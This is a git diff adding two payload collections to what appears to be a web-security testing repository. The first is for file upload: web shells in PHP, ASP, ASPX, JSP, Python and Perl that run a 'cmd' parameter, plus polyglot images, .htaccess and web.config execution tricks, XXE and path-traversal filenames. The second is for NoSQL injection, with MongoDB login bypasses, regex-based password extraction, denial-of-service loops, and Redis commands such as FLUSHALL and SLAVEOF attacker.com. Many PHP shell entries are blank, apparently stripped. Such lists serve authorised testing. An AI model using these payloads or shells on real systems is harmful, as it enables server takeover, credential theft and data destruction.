+shell.sh +shell.bash + +# Executable Extensions +malware.exe +backdoor.bat +script.cmd +payload.ps1 +reverse.sh + +# Server Config Files +.htaccess +.htpasswd +web.config +httpd.conf +.user.ini +php.ini + +# ============================ +# CONTENT-TYPE BYPASSES +# ============================ + +# Common Content-Type Headers to Test: + +# Legitimate looking but with malicious content +Content-Type: image/jpeg +Content-Type: image/png +Content-Type: image/gif +Content-Type: image/bmp +Content-Type: image/svg+xml +Content-Type: application/pdf +Content-Type: application/zip +Content-Type: text/plain +Content-Type: text/csv +Content-Type: application/octet-stream +Content-Type: video/mp4 +Content-Type: audio/mpeg + +# Empty or null +Content-Type: +Content-Type: null +Content-Type: undefined + +# Malformed +Content-Type: image/jpeg; charset=binary +Content-Type: multipart/form-data; boundary=something + +# ============================ +# MAGIC BYTES (File Signatures) +# ============================ + +# PHP Web Shell with JPEG Header +FF D8 FF E0 (JPEG magic bytes) + + +# PHP Web Shell with PNG Header +89 50 4E 47 0D 0A 1A 0A (PNG magic bytes) + + +# PHP Web Shell with GIF Header +GIF89a + + +# PHP Web Shell with PDF Header +%PDF-1.4 + + +# PHP Web Shell with ZIP Header +PK (ZIP magic bytes) + + +# ============================ +# POLYGLOT FILES (Valid Image + Valid Code) +# ============================ + +# GIF + PHP Polyglot +GIF89a + +# JPEG + PHP Polyglot (with comment) +# Add PHP code in JPEG comment section +# Use exiftool: exiftool -Comment='' image.jpg + +# PNG + PHP Polyglot +# Use PNG ancillary chunks to hide PHP code + +# BMP + PHP Polyglot +# BMP header followed by PHP code in pixel data + +# ============================ +# WEB SHELL PAYLOADS +# ============================ + +# === PHP Web Shells === + +# Simple PHP Shell + + +# PHP Shell with POST + + +# PHP Eval Shell + + +# PHP Passthru Shell + + +# PHP Exec Shell + + +# PHP Shell_exec + + +# PHP Backdoor +"; + $cmd = ($_REQUEST['cmd']); + system($cmd); + echo ""; + die; +} +?> + +# PHP File Manager Shell + + +# PHP One-liner Shells + + + + + + +# Obfuscated PHP Shell + + + + + +# PHP Reverse Shell +&3 2>&3"); +?> + +# === ASP/ASPX Web Shells === + +# ASP Shell +<% +Set oScript = Server.CreateObject("WSCRIPT.SHELL") +Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") +Response.Write(oScript.Exec("cmd /c " & Request.QueryString("cmd")).StdOut.ReadAll()) +%> + +# ASPX Shell +<%@ Page Language="C#" %> +<%@ Import Namespace="System.Diagnostics" %> + + +# ASPX One-liner +<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%> + +# === JSP Web Shells === + +# JSP Shell +<%@ page import="java.io.*" %> +<% +String cmd = request.getParameter("cmd"); +Process p = Runtime.getRuntime().exec(cmd); +InputStream in = p.getInputStream(); +int i; +while((i = in.read()) != -1) { + out.print((char)i); +} +%> + +# JSP One-liner +<%Runtime.getRuntime().exec(request.getParameter("cmd"));%> + +# === Python Web Shell === + +#!/usr/bin/env python +import os +import cgi +form = cgi.FieldStorage() +cmd = form.getvalue('cmd') +os.system(cmd) + +# === Perl Web Shell === + +#!/usr/bin/perl +use CGI; +$q = CGI->new; +print $q->header; +print `$q->param('cmd')`; + +# ============================ +# XSS VIA FILE UPLOAD +# ============================ + +# HTML File Upload + + + + + + +# SVG File Upload with XSS + + + + + + + +# SVG with XSS (onload) + + +# PDF with XSS (if rendered in browser) +%PDF-1.4 +1 0 obj +<< +/Type /Catalog +/Outlines 2 0 R +/Pages 3 0 R +/OpenAction << /S /JavaScript /JS (app.alert('XSS');) >> +>> +endobj + +# XML with XSS + + +]> + + + + + + +# ============================ +# XXE VIA FILE UPLOAD +# ============================ + +# SVG with XXE + + ]> + + &xxe; + + +# XML with XXE + + +]> +&xxe; + +# XXE - Parameter Entity + + +%xxe; +]> +&exfil; + +# XXE - Blind OOB + + + +%sp; +%param1; +]> +&exfil; + +# ============================ +# PATH TRAVERSAL IN FILENAME +# ============================ + +# Directory Traversal +../../../etc/passwd +..\..\..\..\windows\system32\config\sam +....//....//....//etc/passwd + +# Overwrite Important Files +../../../var/www/html/index.php +../../../.ssh/authorized_keys +../../config.php +../../../.htaccess +../../wp-config.php + +# Filename with Path Traversal +../../../../tmp/shell.php +..%2f..%2f..%2fetc%2fpasswd +..%252f..%252f..%252fetc%252fpasswd + +# ============================ +# HTACCESS FILE UPLOAD +# ============================ + +# .htaccess to Execute PHP +AddType application/x-httpd-php .jpg +AddType application/x-httpd-php .png +AddType application/x-httpd-php .gif + +# .htaccess to Execute All Files as PHP +AddType application/x-httpd-php . +SetHandler application/x-httpd-php + +# .htaccess to Bypass Upload Restrictions + +SetHandler application/x-httpd-php + + +# ============================ +# WEB.CONFIG FILE UPLOAD (IIS) +# ============================ + + + + + + + + + + +# ============================ +# ARCHIVE-BASED ATTACKS +# ============================ + +# ZIP Slip - Malicious Archive +# Create zip file with: ../../../../var/www/html/shell.php + +# ZIP with Symlink +# ln -s /etc/passwd passwd.txt +# zip --symlinks payload.zip passwd.txt + +# TAR with Path Traversal +# tar -cf payload.tar ../../../../var/www/html/shell.php + +# Zip Bomb (DoS) +# Create highly compressed file that expands to huge size + +# ============================ +# IMAGE METADATA INJECTION +# ============================ + +# EXIF Data with XSS (if displayed) +exiftool -Comment='' image.jpg + +# EXIF Data with PHP Code +exiftool -Comment='' image.jpg + +# IPTC Data Injection +exiftool -IPTC:Caption-Abstract='' image.jpg + +# ============================ +# SERVER-SPECIFIC BYPASSES +# ============================ + +# Apache +shell.php.jpg (with .htaccess: AddType application/x-httpd-php .jpg) +.htaccess file to execute images as PHP + +# IIS +shell.asp;.jpg +shell.asp:.jpg +web.config to execute images as ASP + +# Nginx +shell.php%00.jpg (older versions) +Upload to misconfigured alias/location + +# Tomcat +shell.jsp%00.jpg +shell.jspx + +# ============================ +# RACE CONDITION FILE UPLOAD +# ============================ + +# Upload file quickly and access before validation/deletion +# Technique: Concurrent upload and access requests + +# ============================ +# FILE UPLOAD WITH SIZE BYPASS +# ============================ + +# Small malicious file + + +# Compressed PHP shell + + +# GIF + JavaScript +GIF89a/*alert(1) + + +# Long Filename DoS +# Create extremely long filename to bypass validation + +# Multiple Content-Disposition +Content-Disposition: form-data; name="file"; filename="safe.jpg" +Content-Disposition: form-data; name="file"; filename="shell.php" + +# Null Session (Windows) +\\127.0.0.1\c$\inetpub\wwwroot\shell.php + +# Case Sensitivity Issues +ShElL.PhP +SHELL.php +Shell.PHP + +# ============================ +# FRAMEWORK-SPECIFIC BYPASSES +# ============================ + +# WordPress +wp-content/uploads/shell.php +wp-content/themes/shell.php +wp-content/plugins/shell.php + +# Drupal +sites/default/files/shell.php + +# Joomla +media/shell.php +images/shell.php + +# Laravel +storage/app/shell.php +public/uploads/shell.php + +# Django +media/uploads/shell.py + +# ============================ +# REMOTE FILE INCLUSION VIA UPLOAD +# ============================ + +# Upload file containing: + + + + +# Then access with: +?file=http://attacker.com/shell.txt +?file=php://input (with POST data containing PHP code) +?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ + +# ============================ +# FILE UPLOAD WITH SSRF +# ============================ + +# Upload file that triggers SSRF + + + + +# ============================ +# DESERIALIZATION VIA FILE UPLOAD +# ============================ + +# PHP Phar Deserialization +# Upload malicious .phar file +# Trigger via: file_get_contents('phar://uploads/payload.phar/test.txt') + +# Java Deserialization +# Upload serialized Java object +# Trigger if application deserializes uploaded files + +# ============================ +# EICAR TEST FILE (AV Bypass Testing) +# ============================ + +X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* + +# ============================ +# BINARY PAYLOAD ENCODINGS +# ============================ + +# Base64 Encoded Shell + + +# Hex Encoded + + +# ROT13 + + +# ============================ +# ALTERNATIVE DATA STREAMS (Windows/NTFS) +# ============================ + +shell.php::$DATA +shell.asp::$DATA +payload.txt:hidden.php diff --git a/NoSQL-Injection/README.md b/NoSQL-Injection/README.md new file mode 100644 index 0000000..c837407 --- /dev/null +++ b/NoSQL-Injection/README.md @@ -0,0 +1,38 @@ +# NoSQL Injection + +## Description +NoSQL injection is a vulnerability where an attacker can inject or manipulate NoSQL queries to bypass authentication, extract data, or perform unauthorized operations. This affects databases like MongoDB, CouchDB, Redis, Cassandra, and others that don't use traditional SQL syntax. + +## Common Attack Vectors +- Authentication bypass in login forms +- Data extraction through query manipulation +- MongoDB operator injection ($ne, $gt, $regex, etc.) +- JSON/BSON injection in APIs +- Redis command injection +- CouchDB view manipulation +- Elasticsearch query injection + +## Testing Approach +Submit NoSQL operators, special characters, and query manipulation attempts in: +- Login forms (username/password fields) +- Search parameters +- API endpoints accepting JSON +- Query string parameters +- Cookie values +- HTTP headers + +## Common Vulnerable Patterns +- Direct user input in `find()`, `findOne()` queries +- Unvalidated JSON parsing in authentication +- Improper input sanitization in MongoDB queries +- Exposed NoSQL query interfaces + +## Payloads +See `nosql-injection-payloads.txt` for a comprehensive list of NoSQL injection payloads covering: +- MongoDB injection +- CouchDB injection +- Redis injection +- Cassandra injection +- Elasticsearch injection +- Authentication bypass techniques +- Data extraction methods diff --git a/NoSQL-Injection/nosql-injection-payloads.txt b/NoSQL-Injection/nosql-injection-payloads.txt new file mode 100644 index 0000000..206aea5 --- /dev/null +++ b/NoSQL-Injection/nosql-injection-payloads.txt @@ -0,0 +1,323 @@ +# NoSQL Injection Payloads (2020-2025 Bug Bounty Tested) + +# ============================ +# MongoDB Injection Payloads +# ============================ + +# Authentication Bypass - JSON Format +{"username": {"$ne": null}, "password": {"$ne": null}} +{"username": {"$ne": ""}, "password": {"$ne": ""}} +{"username": {"$gt": ""}, "password": {"$gt": ""}} +{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}} +{"username": "admin", "password": {"$ne": ""}} +{"username": "admin", "password": {"$gt": ""}} +{"username": {"$in": ["admin", "administrator", "root"]}, "password": {"$ne": ""}} + +# Authentication Bypass - URL Encoded +username[$ne]=null&password[$ne]=null +username[$ne]=&password[$ne]= +username[$gt]=&password[$gt]= +username[$regex]=.*&password[$regex]=.* +username=admin&password[$ne]= +username=admin&password[$gt]= +username[$nin][]=&password[$ne]= +username[$exists]=true&password[$exists]=true + +# MongoDB Operators Injection +{"$where": "sleep(5000)"} +{"$where": "this.password == 'admin'"} +{"username": {"$regex": "^admin"}} +{"username": {"$regex": "admin.*"}} +{"email": {"$regex": ".*@domain\\.com$"}} +{"role": {"$in": ["admin", "superuser"]}} +{"age": {"$gt": 0}} +{"price": {"$lt": 9999}} +{"status": {"$ne": "inactive"}} +{"verified": {"$eq": true}} + +# Time-Based NoSQL Injection (MongoDB) +{"$where": "sleep(5000) || true"} +{"username": {"$regex": "^a"}, "$where": "sleep(5000)"} +';sleep(5000);' +';return true;var x=' +{"username": "admin", "$where": "sleep(5000)"} + +# Data Extraction - MongoDB +{"username": {"$regex": "^a"}} +{"username": {"$regex": "^ad"}} +{"username": {"$regex": "^adm"}} +{"username": {"$regex": "^admi"}} +{"username": {"$regex": "^admin"}} +{"password": {"$regex": "^[a-z]"}} +{"apiKey": {"$regex": "^.*"}} + +# Boolean-Based MongoDB Injection +{"username": "admin", "password": {"$ne": "wrong"}} +{"$or": [{"username": "admin"}, {"email": "admin@test.com"}]} +{"$and": [{"username": {"$exists": true}}, {"password": {"$exists": true}}]} +{"$nor": [{"banned": true}, {"deleted": true}]} + +# MongoDB Command Injection +{"username": "admin", "$comment": "test"} +{"username": "admin", "$hint": "username_1"} +{"$orderby": {"username": 1}} +{"username": {"$type": 2}} +{"username": {"$size": 5}} + +# MongoDB Operator Abuse +{"username": {"$all": ["admin"]}} +{"roles": {"$elemMatch": {"role": "admin"}}} +{"metadata": {"$exists": false}} +{"settings": {"$nin": ["disabled"]}} + +# Advanced MongoDB Injection (2023-2025) +{"username": {"$expr": {"$eq": ["$username", "admin"]}}} +{"$expr": {"$gt": [{"$strLenCP": "$password"}, 0]}} +{"username": {"$jsonSchema": {}}} +{"username": "admin'; return true; var a='"} +{"username": "admin\"; return true; var a=\""} + +# ============================ +# CouchDB Injection Payloads +# ============================ + +# CouchDB View Manipulation +startkey="admin"&endkey="admin\ufff0" +startkey=["admin"]&endkey=["admin", {}] +key="admin" +keys=["admin","root","administrator"] + +# CouchDB Query Injection +{"selector": {"username": {"$eq": "admin"}}} +{"selector": {"$or": [{"username": "admin"}, {"role": "admin"}]}} +{"selector": {"password": {"$gt": null}}} +{"selector": {"_id": {"$gte": null}}} + +# CouchDB Mango Query Injection +{"selector": {"$and": [{"username": {"$exists": true}}, {"password": {"$exists": true}}]}} +{"selector": {"username": {"$regex": "(?i)admin"}}} +{"selector": {"email": {"$regex": ".*@.*"}}} + +# ============================ +# Redis Injection Payloads +# ============================ + +# Redis Command Injection +\n\r\nSET key value\r\n +\n\r\nFLUSHALL\r\n +\n\r\nGET password\r\n +\n\r\nKEYS *\r\n +\n\r\nCONFIG GET *\r\n +\n\r\nCONFIG SET dir /var/www/html\r\n +\n\r\nSAVE\r\n +\n\r\nSHUTDOWN\r\n +\n\r\nSLAVEOF attacker.com 6379\r\n + +# Redis Protocol Injection +*1\r\n$8\r\nFLUSHALL\r\n +*1\r\n$4\r\nKEYS\r\n$1\r\n*\r\n +*2\r\n$3\r\nGET\r\n$3\r\nkey\r\n +*3\r\n$3\r\nSET\r\n$4\r\ntest\r\n$5\r\nvalue\r\n + +# Redis Lua Injection +EVAL "return redis.call('GET', 'password')" 0 +EVAL "return redis.call('KEYS', '*')" 0 +EVAL "redis.call('SET', 'hacked', 'true')" 0 + +# ============================ +# Cassandra Injection Payloads +# ============================ + +# Cassandra CQL Injection +' OR '1'='1 +admin' -- +admin' /* +' ALLOW FILTERING -- +' AND token(id) > token(' union select * from users --') + +# ============================ +# Elasticsearch Injection +# ============================ + +# Elasticsearch Query Injection +{"query": {"match_all": {}}} +{"query": {"wildcard": {"username": "*"}}} +{"query": {"regexp": {"password": ".*"}}} +{"query": {"prefix": {"apikey": ""}}} +{"query": {"bool": {"must_not": {"term": {"role": "guest"}}}}} + +# Elasticsearch Script Injection (Groovy/Painless) +{"script": {"source": "doc['password'].value"}} +{"query": {"script_score": {"query": {"match_all": {}}, "script": {"source": "Math.random()"}}}} + +# Elasticsearch Aggregation Injection +{"aggs": {"passwords": {"terms": {"field": "password", "size": 1000}}}} +{"aggs": {"users": {"terms": {"field": "username.keyword"}}}} + +# ============================ +# Generic NoSQL Injection +# ============================ + +# Array Injection +username[]=admin&password[]=password +username[$gt]=&password[$gt]= +{"username": ["$ne", null], "password": ["$ne", null]} + +# Type Confusion +username=admin&password=true +username=admin&password=1 +{"username": "admin", "password": true} +{"username": "admin", "password": 1} + +# Null Byte Injection +admin%00 +admin\x00 +{"username": "admin\u0000"} + +# Comment Injection +admin' // comment +admin' /* comment */ +{"username": "admin' // ", "password": "pass"} + +# Encoding Bypasses +{"username": {"$ne": "\u0000"}} +{"username": {"$regex": "\x2e\x2a"}} + +# ============================ +# Authentication Bypass Combinations (High Success Rate 2020-2025) +# ============================ + +# JSON POST Body +{"username": "admin", "password": {"$ne": null}} +{"username": {"$in": ["admin", "administrator"]}, "password": {"$exists": true}} +{"$or": [{"username": "admin"}, {"username": "administrator"}], "password": {"$gt": ""}} +{"username": "admin", "password": {"$regex": "^.*"}} + +# URL Parameters +?username[$ne]=fake&password[$ne]=fake +?username=admin&password[$gt]= +?username[$regex]=admin&password[$ne]=fake +?username[$in][]=admin&password[$exists]=true + +# Cookie Values +username=admin; password[$ne]=fake +session={"username":{"$ne":null},"password":{"$ne":null}} + +# HTTP Headers +X-Username: admin +X-Password: {"$ne": ""} +Authorization: {"username": {"$ne": null}} + +# ============================ +# Advanced Data Extraction Techniques +# ============================ + +# Character-by-Character Extraction +{"username": {"$regex": "^a.*"}} +{"username": {"$regex": "^ad.*"}} +{"username": {"$regex": "^adm.*"}} + +# Length-Based Extraction +{"password": {"$regex": "^.{8}$"}} +{"password": {"$regex": "^.{1,100}$"}} + +# Character Set Testing +{"password": {"$regex": "^[a-z].*"}} +{"password": {"$regex": "^[A-Z].*"}} +{"password": {"$regex": "^[0-9].*"}} + +# ============================ +# Blind NoSQL Injection +# ============================ + +# Time-Based +{"$where": "sleep(5000)"} +{"$where": "this.username == 'admin' && sleep(5000)"} +{"username": "admin", "$where": "sleep(5000) || true"} + +# Boolean-Based +{"username": "admin", "password": {"$regex": "^a"}} +{"username": "admin", "password": {"$regex": "^b"}} + +# ============================ +# NoSQL Injection Payloads for APIs +# ============================ + +# GraphQL-style NoSQL Injection +{"filter": {"username": {"$ne": null}}} +{"where": {"password": {"$exists": true}}} +{"match": {"role": "admin"}} + +# REST API Query Parameters +?filter[username][$ne]=fake +?where[password][$exists]=true +?sort[role][$eq]=admin + +# ============================ +# Polyglot NoSQL Injection +# ============================ + +' || '1'=='1' || {"$ne":""} +admin' || true || {"$ne": null} +{"$ne": null} || '1'='1 + +# ============================ +# Denial of Service (DoS) Payloads +# ============================ + +{"$where": "while(true){}"} +{"$where": "for(var i=0;i<99999999;i++){}"} +{"username": {"$regex": "^((((((((((a+)+)+)+)+)+)+)+)+)+)$"}} + +# ============================ +# Modern Framework-Specific Injections (2023-2025) +# ============================ + +# Express.js/Node.js +req.body.username[$ne]=null +req.query.password[$gt]= +req.cookies.user[$exists]=true + +# Django MongoDB +{"username__ne": null, "password__ne": null} +{"username__regex": "admin"} +{"password__exists": True} + +# PHP MongoDB +array("username" => array('$ne' => null)) +array("password" => array('$gt' => "")) + +# Python (PyMongo) +{"username": {"$ne": None}, "password": {"$ne": None}} +{"username": {"$regex": ".*admin.*", "$options": "i"}} + +# ============================ +# WAF/Filter Bypass Techniques +# ============================ + +# Unicode Bypass +{"username": {"$\u006Ee": null}} +{"username": {"\u0024ne": null}} + +# Case Variation +{"username": {"$Ne": null}} +{"username": {"$NE": null}} + +# Spacing/Formatting +{"username":{"$ne":null}} +{ "username" : { "$ne" : null } } +{"username" : {"$ne" : null}} + +# Property Pollution +{"__proto__": {"admin": true}} +{"constructor": {"prototype": {"admin": true}}} + +# ============================ +# Server-Side JavaScript Injection (SSJI) +# ============================ + +'; return true; var dummy=' +"; return true; var dummy=" +'; var ret = this; return ret; var dummy=' +{"$where": "function() { return true; }"} +{"$where": "obj.credits - obj.price > 0"} diff --git a/README.md b/README.md index 546f743..321da98 100644 --- a/README.md +++ b/README.md @@ -9,8 +9,10 @@ This repository contains a complete collection of testing payloads organized by **Injection Vulnerabilities:** - **[SQL Injection](./SQL-Injection/)** - Database query manipulation +- **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB) - **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection -- **[Command Injection](./Command-Injection/)** - OS command execution +- **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks +- **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets - **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation - **[Log Injection](./Log-Injection/)** - Log file manipulation - **[XML Injection](./XML-Injection/)** - XML and XXE attacks @@ -28,6 +30,7 @@ This repository contains a complete collection of testing payloads organized by **Server-Side Vulnerabilities:** - **[SSRF](./SSRF/)** - Server-side request forgery - **[Deserialization](./Deserialization/)** - Insecure deserialization +- **[File Upload](./File-Upload/)** - Malicious file upload & RCE techniques **Configuration & Design:** - **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations